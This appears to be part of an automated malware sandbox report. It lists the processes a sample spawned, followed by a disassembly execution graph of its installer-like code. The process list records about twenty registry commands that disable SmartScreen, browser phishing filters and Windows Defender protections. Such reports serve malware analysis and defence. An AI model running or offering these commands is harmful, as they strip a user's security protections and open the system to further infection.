            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:20
            Start time:13:46:58
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:21
            Start time:13:46:58
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:22
            Start time:13:46:58
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:23
            Start time:13:46:59
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:24
            Start time:13:46:59
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:25
            Start time:13:46:59
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:26
            Start time:13:46:59
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:27
            Start time:13:47:00
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:28
            Start time:13:47:00
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:29
            Start time:13:47:00
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:30
            Start time:13:47:00
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:31
            Start time:13:47:01
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:32
            Start time:13:47:01
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:33
            Start time:13:47:01
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:34
            Start time:13:47:01
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:35
            Start time:13:47:02
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:36
            Start time:13:47:02
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:37
            Start time:13:47:02
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:38
            Start time:13:47:02
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:39
            Start time:13:47:03
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:42
            Start time:13:47:03
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:176
            Start time:13:47:23
            Start date:16/06/2023
            Path:C:\Windows\System32\Conhost.exe
            Wow64 process (32bit):
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:
            Has administrator privileges:
            Programmed in:C, C++ or other language

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:16%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:21.2%
              Total number of Nodes:1268
              Total number of Limit Nodes:25
              execution_graph 3381 4025c4 3390 402a9f 3381->3390 3383 4025ce 3384 405b76 ReadFile 3383->3384 3385 40263e 3383->3385 3386 40264e 3383->3386 3389 40263c 3383->3389 3384->3383 3393 405ec3 wsprintfA 3385->3393 3388 402664 SetFilePointer 3386->3388 3386->3389 3388->3389 3391 405f87 17 API calls 3390->3391 3392 402ab4 3391->3392 3392->3383 3393->3389 3394 402245 3395 402ac1 17 API calls 3394->3395 3396 40224b 3395->3396 3397 402ac1 17 API calls 3396->3397 3398 402254 3397->3398 3399 402ac1 17 API calls 3398->3399 3400 40225d 3399->3400 3401 406268 2 API calls 3400->3401 3402 402266 3401->3402 3403 402277 lstrlenA lstrlenA 3402->3403 3408 40226a 3402->3408 3405 40508c 24 API calls 3403->3405 3404 40508c 24 API calls 3407 402272 3404->3407 3406 4022b3 SHFileOperationA 3405->3406 3406->3407 3406->3408 3408->3404 3409 4028c5 3410 402a9f 17 API calls 3409->3410 3411 4028cb 3410->3411 3412 402900 3411->3412 3413 4028dd 3411->3413 3414 402716 3411->3414 3412->3414 3415 405f87 17 API calls 3412->3415 3413->3414 3417 405ec3 wsprintfA 3413->3417 3415->3414 3417->3414 3278 401746 3279 402ac1 17 API calls 3278->3279 3280 40174d 3279->3280 3281 405b2d 2 API calls 3280->3281 3282 401754 3281->3282 3283 405b2d 2 API calls 3282->3283 3283->3282 3418 401947 3419 402ac1 17 API calls 3418->3419 3420 40194e lstrlenA 3419->3420 3421 402577 3420->3421 3422 4022c7 3423 4022ce 3422->3423 3427 4022e1 3422->3427 3424 405f87 17 API calls 3423->3424 3425 4022db 3424->3425 3426 405681 MessageBoxIndirectA 3425->3426 3426->3427 3428 4051ca 3429 405375 3428->3429 3430 4051ec GetDlgItem GetDlgItem GetDlgItem 3428->3430 3432 4053a5 3429->3432 3433 40537d GetDlgItem CreateThread CloseHandle 3429->3433 3473 40405b SendMessageA 3430->3473 3435 4053d3 3432->3435 3436 4053f4 3432->3436 3437 4053bb ShowWindow ShowWindow 3432->3437 3433->3432 3434 40525c 3442 405263 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3434->3442 3439 4053e3 3435->3439 3440 405407 ShowWindow 3435->3440 3443 40542e 3435->3443 3482 40408d 3436->3482 3478 40405b SendMessageA 3437->3478 3479 403fff 3439->3479 3447 405427 3440->3447 3448 405419 3440->3448 3449 4052d1 3442->3449 3450 4052b5 SendMessageA SendMessageA 3442->3450 3443->3436 3444 40543b SendMessageA 3443->3444 3446 405400 3444->3446 3451 405454 CreatePopupMenu 3444->3451 3455 403fff SendMessageA 3447->3455 3454 40508c 24 API calls 3448->3454 3452 4052e4 3449->3452 3453 4052d6 SendMessageA 3449->3453 3450->3449 3456 405f87 17 API calls 3451->3456 3474 404026 3452->3474 3453->3452 3454->3447 3455->3443 3458 405464 AppendMenuA 3456->3458 3460 405482 GetWindowRect 3458->3460 3461 405495 TrackPopupMenu 3458->3461 3459 4052f4 3462 405331 GetDlgItem SendMessageA 3459->3462 3463 4052fd ShowWindow 3459->3463 3460->3461 3461->3446 3464 4054b1 3461->3464 3462->3446 3466 405358 SendMessageA SendMessageA 3462->3466 3465 405313 ShowWindow 3463->3465 3468 405320 3463->3468 3467 4054d0 SendMessageA 3464->3467 3465->3468 3466->3446 3467->3467 3469 4054ed OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3467->3469 3477 40405b SendMessageA 3468->3477 3471 40550f SendMessageA 3469->3471 3471->3471 3472 405531 GlobalUnlock SetClipboardData CloseClipboard 3471->3472 3472->3446 3473->3434 3475 405f87 17 API calls 3474->3475 3476 404031 SetDlgItemTextA 3475->3476 3476->3459 3477->3462 3478->3435 3480 404006 3479->3480 3481 40400c SendMessageA 3479->3481 3480->3481 3481->3436 3483 4040a5 GetWindowLongA 3482->3483 3493 40412e 3482->3493 3484 4040b6 3483->3484 3483->3493 3485 4040c5 GetSysColor 3484->3485 3486 4040c8 3484->3486 3485->3486 3487 4040d8 SetBkMode 3486->3487 3488 4040ce SetTextColor 3486->3488 3489 4040f0 GetSysColor 3487->3489 3490 4040f6 3487->3490 3488->3487 3489->3490 3491 404107 3490->3491 3492 4040fd SetBkColor 3490->3492 3491->3493 3494 404121 CreateBrushIndirect 3491->3494 3495 40411a DeleteObject 3491->3495 3492->3491 3493->3446 3494->3493 3495->3494 3499 4020cb 3500 402ac1 17 API calls 3499->3500 3501 4020d2 3500->3501 3502 402ac1 17 API calls 3501->3502 3503 4020dc 3502->3503 3504 402ac1 17 API calls 3503->3504 3505 4020e6 3504->3505 3506 402ac1 17 API calls 3505->3506 3507 4020f0 3506->3507 3508 402ac1 17 API calls 3507->3508 3509 4020fa 3508->3509 3510 40213c CoCreateInstance 3509->3510 3511 402ac1 17 API calls 3509->3511 3514 40215b 3510->3514 3516 402206 3510->3516 3511->3510 3512 401423 24 API calls 3513 40223c 3512->3513 3515 4021e6 MultiByteToWideChar 3514->3515 3514->3516 3515->3516 3516->3512 3516->3513 3517 4026ce 3518 4026d4 3517->3518 3519 4026d8 FindNextFileA 3518->3519 3522 4026ea 3518->3522 3520 402729 3519->3520 3519->3522 3523 405f65 lstrcpynA 3520->3523 3523->3522 3524 40444f 3525 404485 3524->3525 3526 40445f 3524->3526 3528 40408d 8 API calls 3525->3528 3527 404026 18 API calls 3526->3527 3529 40446c SetDlgItemTextA 3527->3529 3530 404491 3528->3530 3529->3525 3531 4023d0 3532 402ac1 17 API calls 3531->3532 3533 4023e2 3532->3533 3534 402ac1 17 API calls 3533->3534 3535 4023ec 3534->3535 3548 402b51 3535->3548 3538 402716 3539 402421 3541 40242d 3539->3541 3542 402a9f 17 API calls 3539->3542 3540 402ac1 17 API calls 3544 40241a lstrlenA 3540->3544 3543 40244c RegSetValueExA 3541->3543 3545 402f81 31 API calls 3541->3545 3542->3541 3546 402462 RegCloseKey 3543->3546 3544->3539 3545->3543 3546->3538 3549 402b6c 3548->3549 3552 405e19 3549->3552 3553 405e28 3552->3553 3554 405e33 RegCreateKeyExA 3553->3554 3555 4023fc 3553->3555 3554->3555 3555->3538 3555->3539 3555->3540 3556 403b52 3557 403ca5 3556->3557 3558 403b6a 3556->3558 3560 403cb6 GetDlgItem GetDlgItem 3557->3560 3569 403cf6 3557->3569 3558->3557 3559 403b76 3558->3559 3561 403b81 SetWindowPos 3559->3561 3562 403b94 3559->3562 3563 404026 18 API calls 3560->3563 3561->3562 3566 403bb1 3562->3566 3567 403b99 ShowWindow 3562->3567 3568 403ce0 SetClassLongA 3563->3568 3564 403d50 3565 404072 SendMessageA 3564->3565 3574 403ca0 3564->3574 3615 403d62 3565->3615 3570 403bd3 3566->3570 3571 403bb9 DestroyWindow 3566->3571 3567->3566 3572 40140b 2 API calls 3568->3572 3569->3564 3573 401389 2 API calls 3569->3573 3576 403bd8 SetWindowLongA 3570->3576 3577 403be9 3570->3577 3575 403faf 3571->3575 3572->3569 3578 403d28 3573->3578 3575->3574 3585 403fe0 ShowWindow 3575->3585 3576->3574 3582 403c60 3577->3582 3583 403bf5 GetDlgItem 3577->3583 3578->3564 3579 403d2c SendMessageA 3578->3579 3579->3574 3580 40140b 2 API calls 3580->3615 3581 403fb1 DestroyWindow EndDialog 3581->3575 3584 40408d 8 API calls 3582->3584 3586 403c25 3583->3586 3587 403c08 SendMessageA IsWindowEnabled 3583->3587 3584->3574 3585->3574 3589 403c32 3586->3589 3590 403c79 SendMessageA 3586->3590 3591 403c45 3586->3591 3598 403c2a 3586->3598 3587->3574 3587->3586 3588 405f87 17 API calls 3588->3615 3589->3590 3589->3598 3590->3582 3594 403c62 3591->3594 3595 403c4d 3591->3595 3592 403fff SendMessageA 3592->3582 3593 404026 18 API calls 3593->3615 3597 40140b 2 API calls 3594->3597 3596 40140b 2 API calls 3595->3596 3596->3598 3597->3598 3598->3582 3598->3592 3599 404026 18 API calls 3600 403ddd GetDlgItem 3599->3600 3601 403df2 3600->3601 3602 403dfa ShowWindow EnableWindow 3600->3602 3601->3602 3625 404048 EnableWindow 3602->3625 3604 403e24 EnableWindow 3609 403e38 3604->3609 3605 403e3d GetSystemMenu EnableMenuItem SendMessageA 3606 403e6d SendMessageA 3605->3606 3605->3609 3606->3609 3608 403b33 18 API calls 3608->3609 3609->3605 3609->3608 3626 40405b SendMessageA 3609->3626 3627 405f65 lstrcpynA 3609->3627 3611 403e9c lstrlenA 3612 405f87 17 API calls 3611->3612 3613 403ead SetWindowTextA 3612->3613 3614 401389 2 API calls 3613->3614 3614->3615 3615->3574 3615->3580 3615->3581 3615->3588 3615->3593 3615->3599 3616 403ef1 DestroyWindow 3615->3616 3616->3575 3617 403f0b CreateDialogParamA 3616->3617 3617->3575 3618 403f3e 3617->3618 3619 404026 18 API calls 3618->3619 3620 403f49 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3619->3620 3621 401389 2 API calls 3620->3621 3622 403f8f 3621->3622 3622->3574 3623 403f97 ShowWindow 3622->3623 3624 404072 SendMessageA 3623->3624 3624->3575 3625->3604 3626->3609 3627->3611 3628 401cd4 3629 402a9f 17 API calls 3628->3629 3630 401cda IsWindow 3629->3630 3631 401a0e 3630->3631 3632 4014d6 3633 402a9f 17 API calls 3632->3633 3634 4014dc Sleep 3633->3634 3636 402951 3634->3636 3284 401759 3285 402ac1 17 API calls 3284->3285 3286 401760 3285->3286 3287 401786 3286->3287 3288 40177e 3286->3288 3324 405f65 lstrcpynA 3287->3324 3323 405f65 lstrcpynA 3288->3323 3291 401791 3293 4058fd 3 API calls 3291->3293 3292 401784 3295 4061cf 5 API calls 3292->3295 3294 401797 lstrcatA 3293->3294 3294->3292 3312 4017a3 3295->3312 3296 406268 2 API calls 3296->3312 3297 405ad9 2 API calls 3297->3312 3299 4017ba CompareFileTime 3299->3312 3300 40187e 3301 40508c 24 API calls 3300->3301 3304 401888 3301->3304 3302 40508c 24 API calls 3305 40186a 3302->3305 3303 405f65 lstrcpynA 3303->3312 3306 402f81 31 API calls 3304->3306 3307 40189b 3306->3307 3308 4018af SetFileTime 3307->3308 3310 4018c1 FindCloseChangeNotification 3307->3310 3308->3310 3309 405f87 17 API calls 3309->3312 3310->3305 3311 4018d2 3310->3311 3313 4018d7 3311->3313 3314 4018ea 3311->3314 3312->3296 3312->3297 3312->3299 3312->3300 3312->3303 3312->3309 3319 405681 MessageBoxIndirectA 3312->3319 3320 401855 3312->3320 3322 405afe GetFileAttributesA CreateFileA 3312->3322 3315 405f87 17 API calls 3313->3315 3316 405f87 17 API calls 3314->3316 3317 4018df lstrcatA 3315->3317 3318 4018f2 3316->3318 3317->3318 3321 405681 MessageBoxIndirectA 3318->3321 3319->3312 3320->3302 3320->3305 3321->3305 3322->3312 3323->3292 3324->3291 3637 401659 3638 402ac1 17 API calls 3637->3638 3639 40165f 3638->3639 3640 406268 2 API calls 3639->3640 3641 401665 3640->3641 3642 401959 3643 402a9f 17 API calls 3642->3643 3644 401960 3643->3644 3645 402a9f 17 API calls 3644->3645 3646 40196d 3645->3646 3647 402ac1 17 API calls 3646->3647 3648 401984 lstrlenA 3647->3648 3649 401994 3648->3649 3650 4019d4 3649->3650 3654 405f65 lstrcpynA 3649->3654 3652 4019c4 3652->3650 3653 4019c9 lstrlenA 3652->3653 3653->3650 3654->3652 3329 4036db 3330 4036f3 3329->3330 3331 4036e5 CloseHandle 3329->3331 3336 403720 3330->3336 3331->3330 3334 40572d 67 API calls 3335 403704 3334->3335 3337 40372e 3336->3337 3338 4036f8 3337->3338 3339 403733 FreeLibrary GlobalFree 3337->3339 3338->3334 3339->3338 3339->3339 3655 401f5b 3656 402ac1 17 API calls 3655->3656 3657 401f62 3656->3657 3658 4062fd 5 API calls 3657->3658 3659 401f71 3658->3659 3660 401ff1 3659->3660 3661 401f89 GlobalAlloc 3659->3661 3661->3660 3662 401f9d 3661->3662 3663 4062fd 5 API calls 3662->3663 3664 401fa4 3663->3664 3665 4062fd 5 API calls 3664->3665 3666 401fae 3665->3666 3666->3660 3670 405ec3 wsprintfA 3666->3670 3668 401fe5 3671 405ec3 wsprintfA 3668->3671 3670->3668 3671->3660 3672 40255b 3673 402ac1 17 API calls 3672->3673 3674 402562 3673->3674 3677 405afe GetFileAttributesA CreateFileA 3674->3677 3676 40256e 3677->3676 3678 401a5e 3679 402a9f 17 API calls 3678->3679 3680 401a64 3679->3680 3681 402a9f 17 API calls 3680->3681 3682 401a0e 3681->3682 3683 4024df 3693 402b01 3683->3693 3686 402a9f 17 API calls 3687 4024f2 3686->3687 3688 402519 RegEnumValueA 3687->3688 3689 40250d RegEnumKeyA 3687->3689 3690 402716 3687->3690 3691 40252e RegCloseKey 3688->3691 3689->3691 3691->3690 3694 402ac1 17 API calls 3693->3694 3695 402b18 3694->3695 3696 405deb RegOpenKeyExA 3695->3696 3697 4024e9 3696->3697 3697->3686 3698 402c61 3699 402c70 SetTimer 3698->3699 3700 402c89 3698->3700 3699->3700 3701 402cde 3700->3701 3702 402ca3 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3700->3702 3702->3701 3703 401563 3704 4028f9 3703->3704 3707 405ec3 wsprintfA 3704->3707 3706 4028fe 3707->3706 3708 4047e7 3709 404813 3708->3709 3710 4047f7 3708->3710 3712 404846 3709->3712 3713 404819 SHGetPathFromIDListA 3709->3713 3719 405665 GetDlgItemTextA 3710->3719 3715 404830 SendMessageA 3713->3715 3716 404829 3713->3716 3714 404804 SendMessageA 3714->3709 3715->3712 3717 40140b 2 API calls 3716->3717 3717->3715 3719->3714 3720 40166a 3721 402ac1 17 API calls 3720->3721 3722 401671 3721->3722 3723 402ac1 17 API calls 3722->3723 3724 40167a 3723->3724 3725 402ac1 17 API calls 3724->3725 3726 401683 MoveFileA 3725->3726 3727 401696 3726->3727 3728 40168f 3726->3728 3730 406268 2 API calls 3727->3730 3732 40223c 3727->3732 3729 401423 24 API calls 3728->3729 3729->3732 3731 4016a5 3730->3731 3731->3732 3733 405d44 36 API calls 3731->3733 3733->3728 3734 40246d 3735 402b01 17 API calls 3734->3735 3736 402477 3735->3736 3737 402ac1 17 API calls 3736->3737 3738 402480 3737->3738 3739 40248a RegQueryValueExA 3738->3739 3742 402716 3738->3742 3740 4024b0 RegCloseKey 3739->3740 3741 4024aa 3739->3741 3740->3742 3741->3740 3745 405ec3 wsprintfA 3741->3745 3745->3740 3746 4019ed 3747 402ac1 17 API calls 3746->3747 3748 4019f4 3747->3748 3749 402ac1 17 API calls 3748->3749 3750 4019fd 3749->3750 3751 401a04 lstrcmpiA 3750->3751 3752 401a16 lstrcmpA 3750->3752 3753 401a0a 3751->3753 3752->3753 3754 40416f 3755 404185 3754->3755 3758 404291 3754->3758 3760 404026 18 API calls 3755->3760 3756 404300 3757 40430a GetDlgItem 3756->3757 3759 4043ca 3756->3759 3762 404320 3757->3762 3763 404388 3757->3763 3758->3756 3758->3759 3766 4042d5 GetDlgItem SendMessageA 3758->3766 3765 40408d 8 API calls 3759->3765 3761 4041db 3760->3761 3764 404026 18 API calls 3761->3764 3762->3763 3769 404346 SendMessageA LoadCursorA SetCursor 3762->3769 3763->3759 3770 40439a 3763->3770 3767 4041e8 CheckDlgButton 3764->3767 3768 4043c5 3765->3768 3787 404048 EnableWindow 3766->3787 3785 404048 EnableWindow 3767->3785 3791 404413 3769->3791 3774 4043a0 SendMessageA 3770->3774 3775 4043b1 3770->3775 3774->3775 3775->3768 3780 4043b7 SendMessageA 3775->3780 3776 4042fb 3788 4043ef 3776->3788 3778 404206 GetDlgItem 3786 40405b SendMessageA 3778->3786 3780->3768 3782 40421c SendMessageA 3783 404243 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3782->3783 3784 40423a GetSysColor 3782->3784 3783->3768 3784->3783 3785->3778 3786->3782 3787->3776 3789 404402 SendMessageA 3788->3789 3790 4043fd 3788->3790 3789->3756 3790->3789 3794 405647 ShellExecuteExA 3791->3794 3793 404379 LoadCursorA SetCursor 3793->3763 3794->3793 3795 40156f 3796 401586 3795->3796 3797 40157f ShowWindow 3795->3797 3798 402951 3796->3798 3799 401594 ShowWindow 3796->3799 3797->3796 3799->3798 2790 4031f1 SetErrorMode GetVersion 2791 403232 2790->2791 2792 403238 2790->2792 2793 4062fd 5 API calls 2791->2793 2881 40628f GetSystemDirectoryA 2792->2881 2793->2792 2795 40324e lstrlenA 2795->2792 2796 40325d 2795->2796 2884 4062fd GetModuleHandleA 2796->2884 2799 4062fd 5 API calls 2800 40326b 2799->2800 2801 4062fd 5 API calls 2800->2801 2802 403277 #17 OleInitialize SHGetFileInfoA 2801->2802 2890 405f65 lstrcpynA 2802->2890 2805 4032c3 GetCommandLineA 2891 405f65 lstrcpynA 2805->2891 2807 4032d5 GetModuleHandleA 2808 4032ec 2807->2808 2892 405928 2808->2892 2811 4033da 2812 4033ed GetTempPathA 2811->2812 2896 4031c0 2812->2896 2814 403405 2817 403409 GetWindowsDirectoryA lstrcatA 2814->2817 2818 40345f DeleteFileA 2814->2818 2815 405928 CharNextA 2816 403310 2815->2816 2816->2811 2816->2815 2821 4033dc 2816->2821 2820 4031c0 12 API calls 2817->2820 2906 402d48 GetTickCount GetModuleFileNameA 2818->2906 2823 403425 2820->2823 2991 405f65 lstrcpynA 2821->2991 2822 403473 2824 40350d ExitProcess OleUninitialize 2822->2824 2832 405928 CharNextA 2822->2832 2863 4034f9 2822->2863 2823->2818 2826 403429 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 2823->2826 2828 403641 2824->2828 2829 403523 2824->2829 2827 4031c0 12 API calls 2826->2827 2830 403457 2827->2830 2834 4036c3 ExitProcess 2828->2834 2835 403649 GetCurrentProcess OpenProcessToken 2828->2835 3008 405681 2829->3008 2830->2818 2830->2824 2842 40348e 2832->2842 2839 403694 2835->2839 2840 403664 LookupPrivilegeValueA AdjustTokenPrivileges 2835->2840 2841 4062fd 5 API calls 2839->2841 2840->2839 2843 40369b 2841->2843 2844 4034d4 2842->2844 2845 403539 2842->2845 2846 4036b0 ExitWindowsEx 2843->2846 2849 4036bc 2843->2849 2992 4059eb 2844->2992 3012 4055ec 2845->3012 2846->2834 2846->2849 3050 40140b 2849->3050 2853 40355a lstrcatA lstrcmpiA 2853->2824 2856 403576 2853->2856 2854 40354f lstrcatA 2854->2853 2858 403582 2856->2858 2859 40357b 2856->2859 2857 4034ee 3007 405f65 lstrcpynA 2857->3007 3020 4055cf CreateDirectoryA 2858->3020 3015 405552 CreateDirectoryA 2859->3015 2934 4037b5 2863->2934 2865 403587 SetCurrentDirectoryA 2866 4035a1 2865->2866 2867 403596 2865->2867 3024 405f65 lstrcpynA 2866->3024 3023 405f65 lstrcpynA 2867->3023 2872 4035ed CopyFileA 2878 4035af 2872->2878 2873 403635 2875 405d44 36 API calls 2873->2875 2876 40363c 2875->2876 2876->2824 2877 405f87 17 API calls 2877->2878 2878->2873 